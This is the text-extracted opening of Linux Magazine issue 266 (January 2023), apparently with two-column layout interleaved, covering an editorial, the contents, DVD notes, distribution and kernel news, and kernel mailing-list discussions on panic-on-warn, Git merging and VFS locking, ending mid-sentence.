Raspberry Pi Tricks

FR D
+

DV
EE
Go wireless with Bluetooth

ISSUE 266 – JANUARY 2023

Generative
Adversarial
Networks
Forged art and imaginary
faces: Computers teach
computers to lie

Overlay Network Lynis

Keep the spies out of Find vulnerabilities before
your business an attacker finds them
Knowledge Management Build Your Own
with Logseq 3D Bingo Game
catgets
Make your Linux app FOSSPICKS
multilingual 10 TERRIFIC FREE TOOLS!
W W W. L I N U X - M A G A Z I N E . C O M
 EDITORIAL
Welcome

THE NEXT BIG THING

Dear Reader,
Does it seem like the times are changing? I know what An underperforming economy certainly figures in all these
you’re going to say, “The times are always changing in changing fortunes. Investors are less inclined to gamble,
high tech,” which is certainly true. But sometimes they are and advertisers have less money to spend. But another in-
changing in ways you don’t think they should be changing. direct effect of an ailing economy is the rise in interest
Of course, there is nothing like an economic downturn to rates. When money gets more expensive, investors and
bring on a mass extinction of shaky business ideas. But speculators change the way they operate. Interest rates
that’s the kind of thing that goes on all the time. Scanning are now higher than they have been since 2008, which
the news, I get the impression we might be getting to one means that Twitter, Facebook, the crypto economy, and
of those points where some of the stuff that we thought other high-tech initiatives that we have grown accustomed
was going to work seems to be landing far afield. to evolved in a sheltered safe space of easy money that no
First of all, there is the mess over at Twitter. When Elon longer exists. Are these immortal, game-changing prod-
Musk first signaled his interest in buying the micro-mes- ucts that are destined to conquer the world? Or are they
saging giant, there was a lot of discussion about moder- quirky creations birthed in the lagoon of cheap money that
ation policies – in fact, I even wrote about that in this suddenly have to swim in the open ocean? Maybe they
space six months ago – but I don’t think anyone had any will get swallowed up, or maybe they will evolve to sur-
idea about the financial and personnel train wreck that vive, but just so you know: Once they finish evolving, they
would follow. Everyone just assumed this billionaire might not be quite so exotic anymore and might look a lot
would sweep in and buy a company (like billionaires do like all the other fish.
all the time), shake things up, and adroitly tailor the And then when that hap-
product to his business needs. Instead, the thing started pens, we’ll all start over
crumbling almost as soon as he grabbed hold of it. A with looking for the next
company like Twitter has so many moving parts, and its big thing.
profit model is so ephemeral that you can’t just fold it
up and fold it in like you would a trucking company or a
beer distributorship. Companies like Twitter are delicate,
and perhaps Musk should have proceeded more care-
fully before starting in with the ol’ venture capital slash Joe Casad,
and burn playbook. Editor in Chief
Then we have the massive layoffs at Meta. Meta bet big
on the metaverse as the next big thing. Maybe it will be,
and it is just a little too big for Meta, or maybe it really
isn’t the next big thing, and that is part of the reason for
the company’s difficulties. Either way, Facebook’s users
are a commodity, and the real customers are the advertis-
ers. If the cost of developing new features for the meta-
verse exceeds the ability to monetize those features, the
whole thing gets stuck.
And then there is crypto, another next big thing that seems
to be twisting in the wind. Values have fallen sharply, and
yet another crypto exchange has lost everything due to
mismanagement, theft, or just the perils of the business
world. Some economists believe the true value of crypto is
zero, and the industry will eventually get there, whereas
others see blue skies ahead for the crypto industry. Crypto
was once presented as a way to avoid the need for govern-
ment regulation – in fact, that was the whole point of it.
Now many governments are talking about regulating
crypto, and once they regulate it, it will become more like
money and less like a way to spin gold from straw.

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 3

 JANUARY 2023

ON THE COVER
23 Overlay Networks 46 Lynis
The TOR network isn’t the only game in Check for vulnerabilities from the
town. We round up some popular tools command line.
for safer surfing.
62 ReportLab and Panda3D
37 catgets We show you how to build your own
Add foreign language support to your 3D game.
Linux application.
70 Bluetooth LE
40 Logseq Wireless communication with your
Keep your thoughts and notes in good order. Raspberry Pi.

NEWS COVER STORY

8 News 16 Generative Adversarial Networks
• New Arch-Based Linux Distribution Aims to be Auction houses are selling AI-based artwork that looks like
Beginner-Friendly it came from the grand masters. The Internet is peppered
• elementary OS 7 Closer to Release with photos of people who don’t exist, and the movie
• Nitrux 2.5 Released with Kernel 6.0 and KDE Plasma 5.26 industry dreams of resurrecting dead stars. Enter the world
• Zorin OS 16.02 Available of generative adversarial networks.
• Linus Torvalds Considers Dropping i486 Support
• Firefox 106 with Back-Forward Swipe Gesture Support
• First Release Candidate of Linux 6.1 Kernel Announced
• Juno Computers Announces New Tablet for Preorder
IN-DEPTH
• VirtualBox 7.0 Available for Installation
30 MITRE ATT&CK
12 Kernel News The MITRE ATT&CK website keeps information on attackers
• Best Laid Plans and intrusion techniques. We’ll show you how to use that
• Revision Control Theory information to look for evidence of an attack.
• Concurrent Directory Updates
34 Command Line – Modern File Encryption
Age, a modern encryption tool, could soon replace PGP
and GPG when it comes to file encryption.
REVIEWS
37 catgets
20 Distro Walk – Puppy Linux To make programs useful to a worldwide audience, you
Trying out Puppy Linux requires picking a Puppy need to build in support for multiple languages. Catgets
distribution. We provide a brief overview of some of the is a tool that helps you reach beyond your mother
most popular Puppy variants. tongue.

23 Overlay Networks 40 Logseq

An overlay network will help you block unwanted This free knowledge and note-taking app supports tasks,
eavesdroppers on the Internet. We show you some of the to-do lists, journals, and more.
leading open source options.

4 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

16 Generative Adversarial
Networks
What is the secret behind
75 Welcome
the recent explosion of This month in Linux Voice.
computer art and fake videos? 76 Doghouse – AI
One neural network lies to If an artificial intelligence produces something new,

another neural network… who owns the new creation?

78 LibreWolf
LibreWolf, a modified Firefox-based web browser,
simplifies configuration and stops malware and spying.
IN-DEPTH
82 RustDesk
46 Lynis For a long time, TeamViewer and AnyDesk dominated
The complexity of modern Linux distributions offers many the remote maintenance software market. Recently, a
potential attack vectors. Lynis lets you find these new player entered the scene in the form of the free
vulnerabilities before an attacker does. and GPL-licensed RustDesk.

50 Programming Snapshot – Terminal Dashboard 86 FOSSPicks

Using extensions in Go and Ruby, Mike Schilli adapts the This month Graham reviews Tuning Workbench Synth,
WTF terminal dashboard tool to meet his personal needs. Stellarium 1.0, sake, Wonder Shaper, and Samplebrain.

58 Mixing Debian Repositories 92 Tutorial – SQL Database Migration

If you need to mix repositories, a little caution can save you Use a Python API to migrate a music library from SQL
hours of frustrating work. to a NoSQL document database.

MakerSpace
62 ReportLab and Panda3D
A game of bingo illustrates how to use the ReportLab
toolkit and Panda3D real-time 3D engine.

70 Bluetooth LE
Bluetooth Low Energy is ideal for networking battery-powered
sensors. We show you how to use it on the Raspberry Pi. TWO TERRIFIC DISTROS
SEE PAGE 6 FOR DETAILS
DOUBLE-SIDED DVD!
95 Back Issues | 96 Events | 97 Call for Papers | 98 Coming Next Month

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 5

DVD
This Month’s DVD

Ubuntu 22.10 and AlmaLinux 9.0

Two Terrific Distros on a Double-Sided DVD!

Ubuntu 22.10 AlmaLinux 9.0

64-bit 64-bit
Traditionally, Ubuntu’s annual October releases have been AlmaLinux is a leading replacement for CentOS, which
maintenance releases, with few new features. However, IBM discontinued in 2020. Codenamed Emerald Puma,
Ubuntu 22.10, codenamed Kinetic Kudu, is an exception. Al- AlmaLinux 9 continues CentOS’s version numbering
though not a long-term support (LTS) release, it has more and is a member of the distribution family based on
changes and enhancements than most October releases. Fedora and a community-developed clone of Red Hat
To start with, the transition to GTK 4 widgets appears to Enterprise Linux.
be complete in this release, resulting in a small improve- AlmaLinux is primarily an enterprise-grade distribution.
ment in performance. Ubuntu 22.04 also has system- Accordingly, although AlmaLinux 9.0 includes enhance-
wide support for WebP, a new mime format for images ments such as new wallpapers, its major new features
taken from the web. More obviously, PipeWire has re- are more server oriented, with enhancements for cloud
placed PulseAudio as the default sound server, resulting and container development and improved SELinux per-
in improved sound and Bluetooth connection. On the formance and user authentication logs. Other major ad-
desktop, in a feature borrowed from the Unity desktop, ditions include packages and repositories signed with
clicking an icon on the dock presents an overview of all the new RPM-GPG-KEY-AlmaLinux-9. The minimal
open instances of an application. In addition, the System image further enhances security by allowing users to
Setting now includes a link that centralizes desktop con- choose their packages, rather than relying on a curated
figuration, while the Nautilus file manager now adjusts list of features.
window sizes as needed and includes rubberband selec- AlmaLinux is recommended for former users of
tion (multiple file selection with the mouse). Longtime CentOS, enterprise installations, and those who want
users may also notice new defaults, including Gnome a more polished version of Fedora without the
Text Editor rather than gedit and Foliate for Gnome registration required for Red Hat Enterprise Linux.
Books, while the to-do app is now called Endeavour. Like
all Ubuntu releases, Kinetic Kudu provides a polished
desktop for all levels of users.

Defective discs will be replaced. Please send an email to [email protected].

Although this Linux Magazine disc has been tested and is to the best of our knowledge free of malicious software and defects, Linux Magazine
cannot be held responsible and is not liable for any disruption, loss, or damage to data and computer systems related to the use of this disc.

6 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 NEWS
Updates on technologies, trends, and tools
THIS MONTH’S NEWS
08 • New Arch-Based Linux
Distribution Aims to be
Beginner-Friendly
• elementary OS 7 Getting New Arch-Based Linux Distribution Aims to be
Closer to Release
Beginner-Friendly
09 • Nitrux 2.5 Released with
Kernel 6.0 and KDE CachyOS (https://cachyos.org/ ) has one goal, to create a beginner-friendly Arch-
based Linux operating system that can be used by anyone, regardless of how much
Plasma 5.26
• Zorin OS 16.02 Now experience they might have.
Available One might think Arch wouldn’t be the best distribution to serve as a base for such
• Linus Torvalds Considers an operating system, but the developers have opted to go that route. And with the
Dropping i486 Support help of KDE Plasma, which is installed by default, the distribution certainly shows
• More Online promise that they’ll achieve their goal.
Of course, if KDE Plasma isn’t your jam, you can go with Cutefish, i3, Gnome,

10 • Firefox 106 Lands with

Back-Forward Swipe
Openbox, Wayfire, LXQT, bspwm, Kofuku, or Xfce.
Like most Arch spinoffs, CachyOS has a GUI installer that is just as point-and-
Gesture Support clicky as any user-friendly Linux distribution. Another thing you might find interesting
• First Release Candidate of about CachyOS is the developers include a custom version of Firefox, called Cachy
Linux 6.1 Kernel Browser, which is focused on privacy, security, and freedom.
Announced The one caveat to CachyOS is that it doesn’t install much in the way of software.
You’ll find the standard KDE Plasma tools and not much else.
11 • Juno Computers
Announces New Tablet
One thing to keep in mind is that CachyOS is new, so it doesn’t quite achieve the
goal of user-friendliness. In fact, given its current state, I wouldn’t recommend the
for Preorder
OS to anyone other than experienced users.
• VirtualBox 7.0 Now
However, I have faith the developers will continue to simplify the Arch experience
Available for Installation
with this interesting take on the distribution. You can learn more and download
CachyOS here (https://cachyos.org/).

elementary OS 7 Getting Closer to Release

Danielle Foré, Founder & CEO of elementary OS, has announced that the team is now
preparing for the release of 7.0 (https://blog.elementary.io/updates-for-october-2022/ ).
With all blocking window manager issues resolved, the team is ready to move forward.
At this point, the remaining tasks are mostly centered around builds, infrastructure, etc.
But even with the OS in this position, the team is still adding more polish to the release.
But what can you expect with elementary OS 7.0? The team has been fairly
closed-mouthed about the project, but we do know that it will include Flatpak 7.1
(based on Gnome 43) and a number of Gtk 4 improvements.
Other expected features include a modernized look for app icons, a more respon-
sive design, and major improvements to the App Center and System Settings tools.
One goal the team has is to fit the desktop for any device (including mobile). That’s
their idea of a responsive design.
For anyone thinking 7.0 will bring a massive visual change to the distribution,
you’ll be disappointed. Pantheon will remain the same Pantheon you’ve grown ac-
customed to, but with much more polish.
To find out more about what 7.0 might bring, follow the official elementary OS
blog (https://blog.elementary.io/).

8 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 NEWS
Linux News

Nitrux 2.5 Released with Kernel 6.0 and MORE ONLINE

KDE Plasma 5.26
Nitrux (https://nxos.org/ ) is a Linux distribution (based on Debian) that emphasizes Linux Magazine
the use of AppImages for end-user software. And, instead of employing systemd www.linux-magazine.com
as its init system, Nitrux uses OpenRC.
To make things even more interesting, Nitrux adds a suite of convergent applica- ADMIN HPC
tions – called Maui Apps – as well as a curated collection of free and open source http://www.admin-magazine.com/HPC/
software. Analyzing Logs
More importantly, however, Nitrux 2.5 is now available and is the first non-sys- • Jeff Layton
temd distribution to include both kernel 6.0 and KDE Plasma 5.26. To be specific, Log analysis can be used to great effect in
Nitrux uses the 6.0.6 XanMod kernel, KDE Plasma 5.26.2, KDE Frameworks HPC systems. We present an overview of
5.99.0, and KDE Gear 22.08.2. the current log analysis technologies.
As well, the developers decided to change their policy about including the NVIDIA
proprietary driver with the default installation. ADMIN Online
According to the official release notes (https://nxos.org/changelog/release-an- http://www.admin-magazine.com/
nouncement-nitrux-2-5-0/ ), “We’ve decided to change our policy about including this Single Sign-On Like the Big Guys
particular piece of proprietary software to make this distribution more accessible to • Stefano Chittaro
users and to avoid creating a separate ISO file. The minimal ISO does not include the Keycloak is a robust and mature project
NVIDIA Proprietary driver, as we want to keep the size of the ISO image small.” that provides a modern single sign-on
Other features in the new release include the Bismuth KWin plugin (to add a tiling authorization experience and centralized
feature to the window manager), updates for the AMD Vulkan driver, and the inclusion authentication of your apps.
of Distrobox (for container creation).
Tools for Automation in the Cloud
Download an ISO for Nitrux 2.5 here (https://osdn.net/projects/nitrux/down-
• Martin Loschwitz
loads/77946/nitrux-nx-desktop-20221102-amd64.iso/ ). Automation in the cloud does not require
expensive new acquisitions when tools such
as Ansible, Salt, Puppet, or Chef are already
Zorin OS 16.02 Now Available in use locally and can contribute to the
Zorin OS is one of the more user-friendly (and beautiful) Linux distributions on the automatic management and orchestration of
market. Only seven months after unleashing the first point release for the 16th itera- cloud workloads.
tion, a new point release is available that includes a really important feature for
Configuring Complex Environments
those migrating from Windows.
• Thorsten Scherf
With Zorin OS 16.2, users will now find a new Windows App Support menu in the YAML is often the language of choice when
System Tools section of the desktop menu. This new feature makes it considerably configuring complex environments. We help
easier for users to install Windows applications with just a few clicks. you get started with YAML and the YAML
The new Windows App Support feature also makes it easier for the distribution parser yq.
to detect Windows installer files for many popular applications and will suggest
alternatives.
Other features include improved compatibility with Microsoft Office documents
(by including alternatives to proprietary fonts), a much better Zorin Connect experi-
ence (for example, you can now view the status of your laptop battery on your
phone), and GDevelop was added to the Zorin OS Education spin.
LibreOffice 7.4 is installed by default, a new maximize effect and refined physics for
Jelly Mode have been added, as well, and new hardware compatibility has been added.
You can download Zorin OS 16.2 from the official site (https://zorin.com/os/down-
load/) and find out more from the official Zorin blog (https://blog.zorin.
com/2022/10/27/zorin-os-16.2-has-landed/).

Linus Torvalds Considers Dropping

i486 Support
For anyone who still depends on aging hardware for Linux use, you might be in
for an unpleasant surprise. Linus Torvalds has announced that he is considering
dropping support for aging i486 hardware in the kernel.
On this issue, Torvalds says, “We got rid of i386 support back in 2012. Maybe it’s
time to get rid of i486 support in 2022?” (https://lore.kernel.org/lkml/CAHk-
[email protected]/ ).

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 9

NEWS
Linux News

The good news is, i486 hardware is pretty irrelevant at this point and anyone still
depending on such hardware is on borrowed time anyway. In fact, i486 hardware is
pretty much considered a relic of days gone by. However, that doesn’t mean it’s
completely vanished from sight.
Torvalds received a bit of pushback from the statement, as such hardware is still
being shipped. And given that i486 is still the listed minimum requirement for most
Linux distributions and is well accepted by lightweight Linux distributions such as
Tiny Core Linux, the idea might get enough flack that it could be set aside for an-
other year.
However, if Torvalds has his way, the writing is definitely on the wall and i486
support in the Linux kernel will eventually be dropped.
This all might well come down to cmpxchg8b, which is directly tied to the Pentium
F00F bug. The issue might simply become a matter of security. And given how
much work goes into the Linux kernel (and how complicated it has become), it
wouldn’t surprise me in the least if i486 hardware is dropped for this reason alone.

Firefox 106 Lands with Back-Forward Swipe

Gesture Support
The popular open source web browser has been updated to version 106 and in-
cludes a pair of features that should excite many users … with a caveat. But first,
the features.
With the release of Firefox 106, users will be greeted with the ability to use track-
pad gestures (two-finger swipes left and right) to go backward and forward in the
browser. Although this feature has bounced in and out of the browser, previously it
required using the Alt key to make it work. Now, the Alt key isn’t necessary.
However, the caveat is that this feature only works with Wayland, so X11 users
are out of luck. If, however, Wayland is your X server of choice, the feature works
flawlessly.
The next big addition to Firefox 106 is the PDF annotator. This new feature uses
the built-in PDF viewer and allows you to load a PDF in Firefox such that you can
take freehand notes within a PDF. With this new feature, you can adjust the size,
font, and color and even move annotations around as needed.
Other new additions to Firefox 106 include the Firefox View, which makes it easy
to view tabs from other Firefox instances that are connected to your Firefox ac-
count, and a darker Private mode.

You can download Firefox 106 (https://www.mozilla.org/en-US/firefox/106.0/

releasenotes/ ) from the Mozilla site or wait for your distribution of choice to pick it
up in its standard repositories. To find out more about Firefox 106, read the official
release notes (https://www.mozilla.org/en-US/firefox/106.0/releasenotes/ ).

First Release Candidate of Linux 6.1

Kernel Announced
The 6.1 kernel has hit the RC stage. Although this won’t bring about any massive or
deal-making changes to Linux, there are still a few features to get excited about.
Most important is the first inclusion of Rust, which will be greatly expanded over the
coming years.
Get the latest news Other notable features include support for the new Intel Arc and AMD RDNA3 graph-
ics, Multi-Gen LUR VM series (which will give the kernel a significant performance boost
in your inbox every on memory-constrained systems), and the new Kernel Memory Sanitizer.
two weeks In addition, the x86_64 version will warn over W+X mappings, the AMD Platform
Management Framework has been merged, five vulnerabilities with WiFi handling –
Subscribe FREE CVE-2022-41674 (kernels up to 5.19), CVE-2022-42719 (5.2 to 5.19), CVE-2022-
to Linux Update 42720 and CVE-2022-42721 (both 5.1 to 5.19), and CVE-2022-42722 (5.8 to 5.19) –
bit.ly/Linux-Update have been fixed.

10 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 NEWS
Linux News

This release also has better support for Intel’s new Gaudi2 AI accelerator chip,
EUFI support for LoongArch CPUs, and more.
However, Linus Torvalds hasn’t been 100 percent happy with how things have
been going. Prior to the RC release, he made a very pointed statement about devel-
opers pulling all-nighters to meet deadlines.
On that issue, Torvalds said, “that should have gone out the window after high
school. Not for kernel development.”
Read more about the announcement in a message from Linus Torvalds on the Linux
Kernel mailing list (https://lkml.iu.edu/hypermail/linux/kernel/2210.2/00359.html).

Juno Computers Announces New Tablet

for Preorder
The promise of a Linux tablet has been one so many in the community have been
holding their breath over. Every so often a company will make a promise, only to fail
on the delivery. If Juno Computers has anything to say about it, that all changes with
a Debian-based, Mobian Linux/KDE Plasma device.
The new tablet has a 10.1", full HD touchscreen that also has an optional stylus
pen, which is an extra $22. The new tablet is powered by an Intel Celeron N5100 4
Core CPU that runs at 1.1 GHz and includes a 2.8GHz turbo and 8GB LPDDR4 RAM.
Internal storage is 256 GB and is upgradeable to 1TB. The display features a 60HZ
refresh rate and an FHD IPS touchscreen at 1920 x1200.
You can stick with the default Mobian OS or go with Plasma Mobile or Phosh
(both of which are based on Manjaro). Also featured are a 3200 mAh 7.6 battery, a
5MP rear and 1MP front camera, a built-in microphone, and stereo speakers.
You can now pre-order the tablet, which starts at $429.00. One thing to keep in
mind is that, according to the Juno Computers website, “Juno Tablet is a Beta
product – overall the tablet works well but it is still facing some bugs that need to
be fixed.”
Pre-order your tablet on the official Juno Computers site (https://junocomputers.
com/us/product/juno-tablet/ ).

VirtualBox 7.0 Now Available

for Installation
VirtualBox 7.0 is now ready for public consumption. Not only did this release see a
major overhaul to the user interface, it finally enjoys support for Secure Boot, which
means adding hosts like Windows 11 will be much easier.
Other important additions include:

• fully encrypted VMs

• a new resource monitor has been added
• a more streamlined workflow for unattended guest OS installation
• initial support added for automatic updating of guest additions for Linux
• support for guest debugging through GDB
• experimental support for debugging guests with KD/WinDbg

Read the official changelog for VirtualBox 7.0 (https://www.virtualbox.org/wiki/

Changelog-7.0) to find out more.
As of now, VirtualBox 7.0 hasn’t hit the standard repositories for many Linux distri-
butions. However, you can download installers for Linux (as well as the new exten-
sion pack) from the official VirtualBox download page (https://www.virtualbox.org/
wiki/Downloads).
For those who want to benefit from the new features, go the manual installation
route. For those who know how complicated a VirtualBox upgrade can be, your best
bet might be to wait until 7.0 hits the standard repositories for your distribution of
choice.

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 11

NEWS
Kernel News

Zack’s Kernel News

Best Laid Plans response to a warning, even if the gen-
When the Linux kernel encountered a tler boot parameter was selected.
runtime warning, Alexander Popov Andrew Morton suggested that the
didn’t like that it had only two possible whole feature didn’t need to be a boot
responses: Ignore the whole thing, or parameter but could be runtime configu-
panic (i.e., crash ‘n’ burn). The crash ‘n’ rable instead.
burn response would trigger if the user Meanwhile, Petr Mladek felt that the
had set the panic_on_warn flag. Other- whole kit and caboodle was such an ob-
wise, the warning would be ignored. Al- scure kernel feature to begin with, that
exander felt that a nice middle-of-the- “I wonder who uses it in practice and
road response would be for the kernel to what is the experience. The problem is
simply stop whatever it was that caused that many developers do not know
the warning. This way at least the sys- about this behavior. They use WARN()
tem could still function. when they are lazy to write more useful
Chronicler Zack Brown reports Alexander also pointed out some secu- message or when they want to see all
rity problems with the current state of the provided details: task, registry,
on the latest news, views, affairs. He said that to avoid the extreme backtrace.”
dilemmas, and developments response, “panic_on_warn is usually dis- He added, “It somehow reminds me
within the Linux kernel abled on production systems.” And, the saga with %pK. We were not able to
“From a security point of view, kernel teach developers to use it correctly for
community. warning messages provide a lot of useful years and ended with hashed pointers.”
By Zack Brown information for attackers. Many GNU/ The %pK saga refers to an option to the
Linux distributions allow unprivileged printk() kernel function, used for out-
users to read the kernel log, so attackers putting pointers that needed to be hid-
use kernel warning info leak in vulnera- den from unprivileged users. The behav-
bility exploits.” ior of that particular format specifier was
Alexander proposed a compromise so dependent on the configuration state
that system administrators and distribu- that needed to be set, and the specific
tion maintainers would not feel the cases when %pK should or should not be
need to completely disable all responses used were dependent on who would be
to kernel warnings. He said, “Let’s in- reading that output. You can see how de-
troduce the pkill_on_warn boot parame- velopers might be confused.
ter. If this parameter is set, the kernel But that’s neither here nor there. Re-
kills all threads in a process that pro- garding Alexander’s current proposal,
voked a kernel warning. This behavior Petr suggested that the whole panic-on-
is reasonable from a safety point of warning scenario was overkill, and he
view described above. It is also useful pointed out, “What about pr_err(), pr_
for kernel security hardening because crit(), pr_alert(), pr_emerg()? They in-
the system kills an exploit process that form about even more serious prob-
hits a kernel warning.” lems. Why a warning should cause
Alexander posted a patch for panic/pkill while an alert message is
consideration. just printed?”
Kees Cook replied approvingly, “I like To which Alexander replied, “That’s a
Author this idea. I can’t tell if Linus would toler- good question. […] From a security
The Linux kernel mailing list comprises ate it, though. But I really have wanted a point of view, a kernel warning output is
the core of Linux development activities. middle ground like BUG(). Having only interesting for attackers as an infoleak.
Traffic volumes are immense, often WARN() and panic() is not very The messages printed by pr_err(), pr_
reaching 10,000 messages in a week, and friendly.” crit(), pr_alert(), pr_emerg() provide less
keeping up to date with the entire scope Paul E. McKenney suggested that if Al- information.”
of development is a virtually impossible exander’s patch was accepted, it should As for Petr’s assertion that WARN() was
task for one person. One of the few brave blacklist a few specific kernel threads used incorrectly by kernel developers,
souls to take on this task is Zack Brown. that should cause a kernel panic in Steven Rostedt replied:

12 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 NEWS
Kernel News

“WARN() Should never be used just be- returning an error like -ENOSYS for that
cause of laziness. If it is, then that’s a case, for example, but at the same time
bug. Let’s not use that as an excuse to you are ‘If somebody uses this, we should
shoot down this proposal. WARN() perhaps react to it’.
should only be used to test assumptions “In many cases, a ‘pr_warn()‘ is much
where you do not believe something can better. But if you are unsure just _how_
happen. I use it all the time when the the situation can happen, and want a
logic prevents some state, and have the call trace and information about what
WARN() enabled if that state is hit. Be- process did it, and it really is a ‘this
cause to me, it shows something that shouldn’t ever happen’ situation, a
shouldn’t happen happened, and I need WARN_ON() or a WARN_ON_ONCE() is
to fix the code. certainly not wrong.
“Basically, WARN should be used just “So think of WARN_ON() as basically
like BUG. But Linus hates BUG, because an assert, but an assert with the inten-
in most cases, these bad areas shouldn’t tion to be able to continue so that the as-
take down the entire kernel, but for sert can actually be reported. BUG_ON()
some people, they WANT it to take down and friends easily result in a machine
the system.” that is dead. That’s unacceptable.
From this point, the discussion de- “And think of ‘panic-on-warn’ as peo-
scended into implementation details, ple who can deal with their own prob-
with everyone chiming in about ex- lems. It’s fundamentally not your issue.
actly what the behavior should be They took that choice, it’s their problem,
under circumstances X, Y, and Z. At a and the security arguments are pure BS –
certain point, Linus Torvalds offered because WARN_ON() just shouldn’t be
his analysis: something you can trigger anyway.”
“There are only two valid uses for And regarding Alexander’s patch,
panic-on-warn: Linus said “Honestly, I don’t see the
(a) test boxes (particularly VM’s) that point. […] I’d like to hear of an actual
are literally running things like syzbot _use_ case. That’s different. That’s
and want to report any kernel warnings somebody actually _using_ that pkill to
(b) the ‘interchangeable production good effect for some particular load.
machinery’ fail-fast kind of situation […] That said, I don’t much care in the
“So in that (a) case, it’s literally that end. But it sounds like a pointless op-
you consider a warning to be a failure tion to just introduce yet another be-
case, and just want to stop. Very useful havior to something that should never
as a way to get notified by syzbot that happen anyway.”
‘oh, that assert can actually trigger’. The discussion continued briefly. But
“And the (b) case is more of a ‘we without support from Linus, the issue
have 150 million machines, we expect petered out after a short time.
about a thousand of them to fail for any This is a very common occurrence in
random reason any day _anyway_ – kernel development and probably quite
perhaps simply due to hardware failure, common throughout the open source
and we’d rather take a machine down world: Someone has an idea that seems
quickly and then perhaps look at why to address something significant, and
only much later when we have some pat- the only way to raise the issue is to ac-
tern to the failures’. tually code it up and send it out for re-
“You shouldn’t expect panic-on-warn to view. But then having done all that
ever be the case for any actual production work to enable others to join in the con-
machine that _matters_. If it is, that pro- versation, it turns out the true situation
duction maintainer only has themselves is slightly different, and the idea ends
to blame if they set that flag. up being discarded.
“But yes, the expectation is that
warnings are for ‘this can’t happen, Revision Control Theory
but if it does, it’s not necessarily fatal, I Not everyone remembers that Linus Tor-
want to know about it so that I can valds wrote the Git revision control sys-
think about it’. tem like they remember he wrote Linux.
“So it might be a case that you don’t The Git backstory is pretty amazing, but
handle, but that isn’t necessarily _ it’s current story is ongoing. Recently
wrong_ to not handle. You are ok Linus made some comments comparing

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 13

NEWS
Kernel News

Git to other revision control systems and “Again, it’s not that the git model is al- directory and all synchronisation will be
specifically to Darcs – a powerful Git al- ways right – you can obviously have handled on the final server. This helps
ternative by David Roundy. changes that do *not* overlap at all, but hide latency on link from client to server.”
The subject came up when Greg still have a very fundamental semantic Daire Byrne replied with exuberant
Kroah-Hartman submitted a massive conflict, and git will happily merge those enthusiasm, thanking Neil for his work
pull request for a giant pile of kernel things and think it is all good. on this. Daire said, “I’m probably the
driver code coming from dozens of other “So the git model is basically practical main beneficiary of this (NFSD) effort
developers. In submitting the pull re- and straightforward (also ‘stupid’, but in atm so I feel extra special and lucky!”
quest, Greg remarked, “Note, you will a good way – do the common truly obvi- He ran some tests and reported up to a
have a merge conflict in the drivers/net/ ous 3-way merges, don’t try to do any- 40-fold increase in the number of file
wireless/silabs/wfx/sta.c file, please just thing clever when that fails). There’s no creations per second he could achieve,
take the change that came in from the ‘theory’ behind it that might turn out to from 2.4 per second, to up to 121 per
wifi tree. We thought as I had pulled the be completely wrong.” second. He posted some additional
same merge point from the wifi develop- To which Greg replied, “That makes numbers. There were some problems
ers this type of conflict wouldn’t have more sense now, git is being ‘safe’ by remaining, but Daire concluded, “all in
happened, but for some reason git flags asking for the developer to look and re- all, the performance improvements in
it as something to pay attention to and solve it themselves. Thanks for the the knfsd re-export case is looking
couldn’t resolve it itself.” explanation.” great and we have real world use cases
Linus replied: And that was the end of the that this helps with.” In addition, he
“That ‘some reason’ is because the net- conversation. offered to do more testing for the re-
working tree made other changes to the maining difficult cases.
file since (ie commit 2c33360bce6a: ‘wfx: Concurrent Directory Neil was very happy for the feedback
use container_of() to get vif’). Updates and posted some updated patches to ad-
“So both branches had done the same The Virtual Filesystem (VFS) is the cen- dress some of the problems Daire’s tests
change (the merge), but one branch had tral, core, generic filesystem code within had uncovered.
then done other changes on top of that the kernel, around which all other file- Anna Schumaker and Daire both
same change. systems revolve. All filesystems interact started testing the new patches on their
“Broken SCM thinking then thinks that with the VFS to provide their special systems, and both reported some further
means that ‘oh, then we obviously have data-storing features, and all applica- timing data. Neil was thrilled to have
to take the extra change’ (eg darcs ‘patch tions interact with the VFS to access all more testers and posted additional
algebra’), and make that the basis of that stored data. patches addressing the issues they had
their resolution strategy. It’s not actually A major goal of the VFS is to provide uncovered.
a valid model, because it just assumes as fast as possible communication be- At one point, Daire said, “This patch
that the additional patches were right. tween applications and the data on the does the job for me – no more stack
Maybe there was a _reason_ that extra underlying filesystems. Recently, Neil traces and things have been stable all
patch wasn’t done in the other branch? Brown asked folks to discuss an issue he day. I’m going to run some production
The extra patch might have been due to had noticed in the VFS: loads over the weekend and then I’ll do
particular issues in that branch, you “VFS currently holds an exclusive lock some more artificial scale testing next
can’t just make the darcs assumption of on a directory during create, unlink, re- week. Thanks again for this work! Im-
reordering patches and taking some name. This imposes serialisation on all proving the parallelism anywhere we
union of them (which is an over-simplifi- filesystems though some may not benefit can for single clients and then nfsd is
cation of the patch algebra rules). from it, and some may be able to provide great for reexport servers (especially
“Now, that’s not to say that git can’t finer grained locking internally, thus re- once you add some ‘cloud’ latency).”
get things wrong too when resolving ducing contention. There was no further discussion, just
things. But at least it doesn’t make some “This series allows the filesystem to re- a few more test results. This does not
fundamental mistake like that. quest that the inode lock be shared rather necessarily mean the code will go into
“The git rules are basically that it will than exclusive. In that case an exclusive the kernel – it still has to pass through
resolve changes that aren’t overlapping, lock will be held on the dentry instead, Al Viro’s gauntlet because he main-
using the traditional 3-way model (it much as is done for parallel lookup. tains the VFS code and will want to be
then has that whole ‘recursion and re- “The NFS filesystem can easily support sure there are no new problems intro-
